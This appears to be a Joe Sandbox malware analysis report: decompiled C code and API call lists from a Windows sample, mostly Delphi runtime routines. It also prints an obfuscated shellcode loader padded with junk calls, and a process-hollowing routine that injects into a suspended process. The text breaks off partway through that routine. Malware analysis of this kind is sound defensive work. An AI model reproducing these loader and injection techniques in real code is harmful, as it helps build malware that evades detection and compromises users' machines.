    			}





    APIs
    • WSAStartup.WSOCK32(00000101,00454880), ref: 0041797E
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    APIs
    • RtlEnterCriticalSection.KERNEL32(004545C4,00000000,00402218), ref: 004020E7
    • RtlLeaveCriticalSection.KERNEL32(004545C4,0040221F), ref: 00402212
      • Part of subcall function 004019B0: RtlInitializeCriticalSection.KERNEL32(004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019C6
      • Part of subcall function 004019B0: RtlEnterCriticalSection.KERNEL32(004545C4,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019D9
      • Part of subcall function 004019B0: LocalAlloc.KERNEL32(00000000,00000FF8,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A03
      • Part of subcall function 004019B0: RtlLeaveCriticalSection.KERNEL32(004545C4,00401A6D,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A60
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 79%
    			E00403D1C() {
    				struct HINSTANCE__* _t24;
    				void* _t32;
    				intOrPtr _t35;
    				void* _t45;
    
    				if( *0x00454658 != 0 ||  *0x454040 == 0) {
    					L3:
    					if( *0x419004 != 0) {
    						E00403C04();
    						E00403C90(_t32);
    						 *0x419004 = 0;
    					}
    					L5:
    					while(1) {
    						if( *((char*)(0x454658)) == 2 &&  *0x419000 == 0) {
    							 *0x0045463C = 0;
    						}
    						E00403AB8();
    						if( *((char*)(0x454658)) <= 1 ||  *0x419000 != 0) {
    							_t14 =  *0x00454640;
    							if( *0x00454640 != 0) {
    								E0040532C(_t14);
    								_t35 =  *((intOrPtr*)(0x454640));
    								_t7 = _t35 + 0x10; // 0x400000
    								_t24 =  *_t7;
    								_t8 = _t35 + 4; // 0x400000
    								if(_t24 !=  *_t8 && _t24 != 0) {
    									FreeLibrary(_t24);
    								}
    							}
    						}
    						E00403A90();
    						if( *((char*)(0x454658)) == 1) {
    							 *0x00454654();
    						}
    						if( *((char*)(0x454658)) != 0) {
    							E00403C60();
    						}
    						if( *0x454630 == 0) {
    							if( *0x454024 != 0) {
    								 *0x454024();
    							}
    							ExitProcess( *0x419000); // executed
    						}
    						memcpy(0x454630,  *0x454630, 0xb << 2);
    						_t45 = _t45 + 0xc;
    						0x419000 = 0x419000;
    					}
    				} else {
    					do {
    						 *0x454040 = 0;
    						 *((intOrPtr*)( *0x454040))();
    					} while ( *0x454040 != 0);
    					goto L3;
    				}
    			}








    APIs
    • ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
      • Part of subcall function 00403C90: MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    • FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 79%
    			E00403D14() {
    				intOrPtr* _t13;
    				struct HINSTANCE__* _t27;
    				void* _t36;
    				intOrPtr _t39;
    				void* _t52;
    
    				 *((intOrPtr*)(_t13 +  *_t13)) =  *((intOrPtr*)(_t13 +  *_t13)) + _t13 +  *_t13;
    				if( *0x00454658 != 0 ||  *0x454040 == 0) {
    					L5:
    					if( *0x419004 != 0) {
    						E00403C04();
    						E00403C90(_t36);
    						 *0x419004 = 0;
    					}
    					L7:
    					if( *((char*)(0x454658)) == 2 &&  *0x419000 == 0) {
    						 *0x0045463C = 0;
    					}
    					E00403AB8();
    					if( *((char*)(0x454658)) <= 1 ||  *0x419000 != 0) {
    						_t17 =  *0x00454640;
    						if( *0x00454640 != 0) {
    							E0040532C(_t17);
    							_t39 =  *((intOrPtr*)(0x454640));
    							_t7 = _t39 + 0x10; // 0x400000
    							_t27 =  *_t7;
    							_t8 = _t39 + 4; // 0x400000
    							if(_t27 !=  *_t8 && _t27 != 0) {
    								FreeLibrary(_t27);
    							}
    						}
    					}
    					E00403A90();
    					if( *((char*)(0x454658)) == 1) {
    						 *0x00454654();
    					}
    					if( *((char*)(0x454658)) != 0) {
    						E00403C60();
    					}
    					if( *0x454630 == 0) {
    						if( *0x454024 != 0) {
    							 *0x454024();
    						}
    						ExitProcess( *0x419000); // executed
    					}
    					memcpy(0x454630,  *0x454630, 0xb << 2);
    					_t52 = _t52 + 0xc;
    					0x419000 = 0x419000;
    					goto L7;
    				} else {
    					do {
    						 *0x454040 = 0;
    						 *((intOrPtr*)( *0x454040))();
    					} while ( *0x454040 != 0);
    					goto L5;
    				}
    			}









    APIs
    • ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
      • Part of subcall function 00403C90: MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    • FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 79%
    			E00403D18() {
    				struct HINSTANCE__* _t26;
    				void* _t35;
    				intOrPtr _t38;
    				void* _t51;
    
    				if( *0x00454658 != 0 ||  *0x454040 == 0) {
    					L4:
    					if( *0x419004 != 0) {
    						E00403C04();
    						E00403C90(_t35);
    						 *0x419004 = 0;
    					}
    					L6:
    					if( *((char*)(0x454658)) == 2 &&  *0x419000 == 0) {
    						 *0x0045463C = 0;
    					}
    					E00403AB8();
    					if( *((char*)(0x454658)) <= 1 ||  *0x419000 != 0) {
    						_t16 =  *0x00454640;
    						if( *0x00454640 != 0) {
    							E0040532C(_t16);
    							_t38 =  *((intOrPtr*)(0x454640));
    							_t7 = _t38 + 0x10; // 0x400000
    							_t26 =  *_t7;
    							_t8 = _t38 + 4; // 0x400000
    							if(_t26 !=  *_t8 && _t26 != 0) {
    								FreeLibrary(_t26);
    							}
    						}
    					}
    					E00403A90();
    					if( *((char*)(0x454658)) == 1) {
    						 *0x00454654();
    					}
    					if( *((char*)(0x454658)) != 0) {
    						E00403C60();
    					}
    					if( *0x454630 == 0) {
    						if( *0x454024 != 0) {
    							 *0x454024();
    						}
    						ExitProcess( *0x419000); // executed
    					}
    					memcpy(0x454630,  *0x454630, 0xb << 2);
    					_t51 = _t51 + 0xc;
    					0x419000 = 0x419000;
    					goto L6;
    				} else {
    					do {
    						 *0x454040 = 0;
    						 *((intOrPtr*)( *0x454040))();
    					} while ( *0x454040 != 0);
    					goto L4;
    				}
    			}








    APIs
    • ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
      • Part of subcall function 00403C90: MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    • FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00405824(intOrPtr* __eax, void* __edx) {
    				char _v1032;
    				int _t13;
    				void* _t22;
    
    				_t21 = __edx;
    				if(__eax != 0) {
    					if( *(__eax + 4) >= 0x10000) {
    						return E00404080(__edx,  *(__eax + 4));
    					}
    					_t13 = LoadStringA(E00404DCC( *((intOrPtr*)( *__eax))),  *(__eax + 4),  &_v1032, 0x400); // executed
    					return E00403F78(_t21, _t13, _t22);
    				}
    				return __eax;
    			}







    APIs
    • LoadStringA.USER32(00000000,00010000,?,00000400), ref: 00405855
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00404D84(void* __eax) {
    				char _v272;
    				intOrPtr _t14;
    				void* _t16;
    				intOrPtr _t18;
    				intOrPtr _t19;
    
    				_t16 = __eax;
    				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
    					GetModuleFileNameA( *(__eax + 4),  &_v272, 0x105);
    					_t14 = E00404FC0(_t19); // executed
    					_t18 = _t14;
    					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
    					if(_t18 == 0) {
    						 *((intOrPtr*)(_t16 + 0x10)) =  *((intOrPtr*)(_t16 + 4));
    					}
    				}
    				return  *((intOrPtr*)(_t16 + 0x10));
    			}









    APIs
    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00404DA2
      • Part of subcall function 00404FC0: GetModuleFileNameA.KERNEL32(00000000,?,00000105,0000000B,00000000), ref: 00404FDC
      • Part of subcall function 00404FC0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00404FFA
      • Part of subcall function 00404FC0: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00405018
      • Part of subcall function 00404FC0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405036
      • Part of subcall function 00404FC0: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040507F
      • Part of subcall function 00404FC0: RegQueryValueExA.ADVAPI32(?,0040522C,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001), ref: 0040509D
      • Part of subcall function 00404FC0: RegCloseKey.ADVAPI32(?,004050CC,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004050BF
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004050DC
      • Part of subcall function 00404FC0: GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004050E9
      • Part of subcall function 00404FC0: GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004050EF
      • Part of subcall function 00404FC0: lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040511A
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405161
      • Part of subcall function 00404FC0: LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405171
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405199
      • Part of subcall function 00404FC0: LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004051A9
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 004051CF
      • Part of subcall function 00404FC0: LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 004051DF
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 37%
    			E00402670(void* __eax) {
    				void* _t3;
    				void* _t6;
    
    				if(__eax <= 0) {
    					_t6 = 0;
    				} else {
    					_t3 =  *0x41903c(); // executed
    					_t6 = _t3;
    					if(_t6 == 0) {
    						E00402778(1);
    					}
    				}
    				return _t6;
    			}






    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00403B78(intOrPtr __eax, intOrPtr __edx) {
    				void* _t6;
    				intOrPtr _t7;
    
    				_t7 = __edx;
    				 *0x454014 = 0x4011a8;
    				 *0x454018 = 0x4011b0;
    				 *0x454638 = __eax;
    				 *0x45463c = 0;
    				 *0x454640 = __edx;
    				_t1 = _t7 + 4; // 0x400000
    				 *0x45402c =  *_t1;
    				E00403A70();
    				 *0x454034 = 0; // executed
    				_t6 = E00403B18(); // executed
    				return _t6;
    			}






    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd

    Non-executed Functions

    C-Code - Quality: 100%
    			E00417A70() {
    
    				if( *0x454a18 == 0) {
    					 *0x454a18 = GetModuleHandleA("kernel32.dll");
    					if( *0x454a18 != 0) {
    						 *0x454a1c = GetProcAddress( *0x454a18, "CreateToolhelp32Snapshot");
    						 *0x454a20 = GetProcAddress( *0x454a18, "Heap32ListFirst");
    						 *0x454a24 = GetProcAddress( *0x454a18, "Heap32ListNext");
    						 *0x454a28 = GetProcAddress( *0x454a18, "Heap32First");
    						 *0x454a2c = GetProcAddress( *0x454a18, "Heap32Next");
    						 *0x454a30 = GetProcAddress( *0x454a18, "Toolhelp32ReadProcessMemory");
    						 *0x454a34 = GetProcAddress( *0x454a18, "Process32First");
    						 *0x454a38 = GetProcAddress( *0x454a18, "Process32Next");
    						 *0x454a3c = GetProcAddress( *0x454a18, "Process32FirstW");
    						 *0x454a40 = GetProcAddress( *0x454a18, "Process32NextW");
    						 *0x454a44 = GetProcAddress( *0x454a18, "Thread32First");
    						 *0x454a48 = GetProcAddress( *0x454a18, "Thread32Next");
    						 *0x454a4c = GetProcAddress( *0x454a18, "Module32First");
    						 *0x454a50 = GetProcAddress( *0x454a18, "Module32Next");
    						 *0x454a54 = GetProcAddress( *0x454a18, "Module32FirstW");
    						 *0x454a58 = GetProcAddress( *0x454a18, "Module32NextW");
    					}
    				}
    				if( *0x454a18 == 0 ||  *0x454a1c == 0) {
    					return 0;
    				} else {
    					return 1;
    				}
    			}




    APIs
    • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389,?,?,?,?,?,004183C2,00000000,004183DD), ref: 00417A84
    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389,?,?,?,?,?,004183C2), ref: 00417A9C
    • GetProcAddress.KERNEL32(00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389), ref: 00417AAE
    • GetProcAddress.KERNEL32(00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389), ref: 00417AC0
    • GetProcAddress.KERNEL32(00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389), ref: 00417AD2
    • GetProcAddress.KERNEL32(00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7), ref: 00417AE4
    • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000), ref: 00417AF6
    • GetProcAddress.KERNEL32(00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002), ref: 00417B08
    • GetProcAddress.KERNEL32(00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot), ref: 00417B1A
    • GetProcAddress.KERNEL32(00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst), ref: 00417B2C
    • GetProcAddress.KERNEL32(00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext), ref: 00417B3E
    • GetProcAddress.KERNEL32(00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First), ref: 00417B50
    • GetProcAddress.KERNEL32(00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next), ref: 00417B62
    • GetProcAddress.KERNEL32(00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory), ref: 00417B74
    • GetProcAddress.KERNEL32(00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First), ref: 00417B86
    • GetProcAddress.KERNEL32(00000000,Module32FirstW,00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next), ref: 00417B98
    • GetProcAddress.KERNEL32(00000000,Module32NextW,00000000,Module32FirstW,00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW), ref: 00417BAA
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 73%
    			E0300966F(void* __eflags) {
    				char _v5;
    				long _v12;
    				long _v16;
    				int _v20;
    				int _v24;
    				char _v28;
    				void* _v32;
    				struct tagPIXELFORMATDESCRIPTOR _v72;
    				void* _t41;
    				int _t49;
    				void* _t50;
    				intOrPtr* _t58;
    				long _t65;
    				long _t69;
    				int _t73;
    				void* _t79;
    				int _t80;
    
    				_t41 = E03002C60(0x300cb48);
    				_t80 = 0;
    				if(_t41 > 0x1b3 && _v72.cStencilBits != 0x84b9b && _v72.cStencilBits != 0x1104) {
    					E0300958A(_t41);
    					ShellExecuteA(0, 0, 0, 0, 0, 0);
    					ShellAboutW(0, 0, 0, 0);
    					ExtractIconA(0, 0, 0);
    					_push("osurhfoiuasdf asdiuyfghas dofioaysgfuioaysdgf");
    					_push(0x300cb48);
    					E03002BD0();
    				}
    				_v12 = 1;
    				_v12 = 0x583e9;
    				GetColorSpace(_t80);
    				GetLogColorSpaceA(_t80, _t80, _t80);
    				ChoosePixelFormat(_t80,  &_v72);
    				SetICMMode(_t80, _t80);
    				_v20 = _t80;
    				_v24 = _t80;
    				do {
    					_t65 = GetPrivateProfileSectionNamesA(0x300cb48, _t80, "doifughsg siodufhg sdfoughjsiopdfughj");
    					__imp__GetCalendarInfoW(_t80, _t80, _t80, _t80, _t80,  &_v28);
    					_t49 = GetLocaleInfoW(_t80, _t80, 0x300cf50, _t80);
    					if(_v20 > 0x7530 && _t65 != 0x6f6f3 && _v28 != 0x4278f9 && _t49 != 0x176cf5a) {
    						_v24 = 0x6f;
    						 *0x300cf48 = GetModuleHandleW(L"kernel32.dll");
    					}
    					_v20 = _v20 + 1;
    				} while (_v24 != 0x6f);
    				_t50 = LocalAlloc(_t80, _v12);
    				_v24 = 0x30142d8;
    				_t73 = _v24;
    				_t79 = _t50;
    				_t69 = 0;
    				_v32 = _t79;
    				if(_v12 > _t80) {
    					_v20 = 0xfffffffe;
    					_v20 = _v20 - _t73;
    					_t23 = _t73 + 2; // 0x30142da
    					_t58 = _t23;
    					do {
    						_t24 = _t58 - 1; // 0x586416a5
    						_v5 =  *_t58;
    						_t26 = _t58 - 2; // 0x6416a5c8
    						 *((char*)(_t69 + _t79)) =  *_t26;
    						 *((char*)(_t69 + _t79 + 1)) =  *_t24;
    						 *((char*)(_t69 + _t79 + 2)) = _v5;
    						_t58 = _t58 + 3;
    						_t69 = _t69 + 3;
    					} while (_v20 + _t58 < _v12);
    				}
    				_v12 = _t69;
    				VirtualProtect(_t79, 0x583e9, 0x40,  &_v16);
    				if(_v12 > _t80) {
    					do {
    						GetTickCount();
    						_t80 = _t80 + 1;
    					} while (_t80 < _v12);
    				}
    				E03009651( &_v12, _t79);
    				_v32();
    				return 0;
    			}





















    APIs
    • _strlen.LIBCMT ref: 0300967E
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 030096AA
    • ShellAboutW.SHELL32(00000000,00000000,00000000,00000000), ref: 030096B4
    • ExtractIconA.SHELL32(00000000,00000000,00000000), ref: 030096BD
    • GetColorSpace.GDI32(00000000), ref: 030096DF
    • GetLogColorSpaceA.GDI32(00000000,00000000,00000000), ref: 030096E8
    • ChoosePixelFormat.GDI32(00000000,?), ref: 030096F3
    • SetICMMode.GDI32(00000000,00000000), ref: 030096FB
    • GetPrivateProfileSectionNamesA.KERNEL32(0300CB48,00000000,doifughsg siodufhg sdfoughjsiopdfughj), ref: 0300970E
    • GetCalendarInfoW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?), ref: 0300971F
    • GetLocaleInfoW.KERNEL32(00000000,00000000,0300CF50,00000000), ref: 0300972D
    • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 03009760
    • LocalAlloc.KERNEL32(00000000,000583E9), ref: 03009778
    • VirtualProtect.KERNEL32(00000000,000583E9,00000040,?), ref: 030097D9
    • GetTickCount.KERNEL32 ref: 030097E4
      • Part of subcall function 0300958A: WinHttpCloseHandle.WINHTTP(00000000,00000000,030096A4), ref: 0300958E
      • Part of subcall function 0300958A: WinHttpConnect.WINHTTP(00000000,00000000,00000000,00000000), ref: 03009598
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1468041017.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000002.00000002.1468029210.03000000.00000002.sdmp
    • Associated: 00000002.00000002.1468050212.0300B000.00000008.sdmp
    • Associated: 00000002.00000002.1468058188.0300C000.00000004.sdmp
    • Associated: 00000002.00000002.1468067852.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3000000_obtG43AWHP.jbxd
    C-Code - Quality: 76%
    			E00417F5C(intOrPtr __eax, void* __ebx, short* __ecx, char __edx, void* __edi, void* __esi, void* __fp0, intOrPtr* _a4) {
    				intOrPtr _v8;
    				char _v12;
    				CONTEXT* _v16;
    				void* _v20;
    				void _v24;
    				void _v28;
    				long _v32;
    				struct _PROCESS_INFORMATION _v48;
    				struct _STARTUPINFOA _v116;
    				CHAR* _t95;
    				short* _t171;
    				intOrPtr _t182;
    				intOrPtr _t189;
    				intOrPtr* _t194;
    				short* _t196;
    				void* _t197;
    				void* _t199;
    				void* _t200;
    				intOrPtr _t201;
    				void* _t215;
    
    				_t215 = __fp0;
    				_t199 = _t200;
    				_t201 = _t200 + 0xffffff90;
    				_t196 = __ecx;
    				_v12 = __edx;
    				_v8 = __eax;
    				E00404338(_v8);
    				E00404338(_v12);
    				_push(_t199);
    				_push(0x418218);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t201;
    				if(_v12 != 0) {
    					_push(0x418230);
    					_push(_v8);
    					_push(0x41823c);
    					_push(_v12);
    					E00404208();
    				}
    				 *_a4 = 0;
    				_t171 = _t196;
    				if( *_t171 == 0x5a4d) {
    					_t194 =  *((intOrPtr*)(_t171 + 0x3c)) + _t196;
    					if( *_t194 == 0x4550) {
    						E00402B60( &_v116, 0x44);
    						E00402B60( &_v48, 0x10);
    						_v116.cb = 0x44;
    						_v116.dwFlags = 1;
    						_v116.wShowWindow = 0;
    						_t95 = E00404348(_v12);
    						if(CreateProcessA(E00404348(_v8), _t95, 0, 0, 0, 4, 0, 0,  &_v116,  &_v48) != 0) {
    							 *_a4 = _v48.dwProcessId;
    							_v16 = E00417F28( &_v20);
    							if(_v16 != 0) {
    								_v16->ContextFlags = 0x10007;
    								if(GetThreadContext(_v48.hThread, _v16) != 0) {
    									ReadProcessMemory(_v48.hProcess, _v16->Ebx + 8,  &_v24, 4,  &_v32);
    									if( *(_t194 + 0x34) != _v24) {
    										_v28 = VirtualAllocEx(_v48.hProcess,  *(_t194 + 0x34),  *(_t194 + 0x50), 0x3000, 0x40);
    									} else {
    										if(NtUnmapViewOfSection(_v48.hProcess,  *(_t194 + 0x34)) != 0) {
    											_v28 = VirtualAllocEx(_v48.hProcess, 0,  *(_t194 + 0x50), 0x3000, 0x40);
    										} else {
    											_v28 = VirtualAllocEx(_v48.hProcess,  *(_t194 + 0x34),  *(_t194 + 0x50), 0x3000, 0x40);
    										}
    									}
    									_t210 = _v28;
    									if(_v28 != 0) {
    										_t197 = E00417EA4(_t196, _t210);
    										_t125 = _v28;
    										if( *(_t194 + 0x34) != _v28) {
